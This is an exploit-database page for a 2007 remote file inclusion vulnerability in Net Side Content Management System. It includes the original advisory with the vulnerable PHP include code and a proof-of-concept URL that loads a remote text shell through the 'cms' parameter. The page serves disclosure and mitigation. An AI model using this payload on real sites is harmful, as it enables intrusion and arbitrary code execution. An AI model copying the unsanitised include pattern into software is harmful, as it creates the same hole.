header-logo
Suggest Exploit
vendor:
Net Side Content Management System
by:
sharingan
N/A
CVSS
HIGH
Remote File Inclusion
22
CWE
Product Name: Net Side Content Management System
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Net Side Content Management System Remote File Inclusion Vulnerability

The Net Side Content Management System is vulnerable to remote file inclusion. This can be exploited by an attacker by manipulating the 'cms' parameter in the URL to include arbitrary files from remote servers. The vulnerability exists in two versions of the script, and the proof of concept demonstrates how an attacker can include a remote text shell. This vulnerability allows an attacker to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Net Side Content Management System script. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

I see your future and your future is death. Sharingan !
--------------------------------------------------------------------------------------------------------------
Hi I'm sharingan and this is my vuln :
script name :
Net Side Content Management System
(2 versions found both vulnerable | Version names not available since the script isn't downloadable)

vuln file :
index.php |and maybe others ... haven't checked|
vuln code version 1:
[...]
    if ($_GET["cms"] == "" or $_GET["cms"] == "titel")
   {
    include "titel.inc.php";
   }
   else
   {
    include $_GET["cms"].".inc.php";
[...]
vuln code version 2:
[...]
$includepath = "";
[...]
if ($_GET["cms"] == "")
   {
     include $includepath."titel.inc.php";
   }
   else
   {
    include $includepath.$_GET["cms"].".inc.php";
[...]

proof of concept :
http://site.com/index.php?cms=http://whatever.com/textshell.txt?
"powered by Net-Side.net"
--------------------------------------------------------------------------------------------------------------
greetz mozi and all php freaks.
oh yeah and a friendly Hi! to RST.

# milw0rm.com [2007-03-24]

Navigation

Suggest Exploit

Services By CQR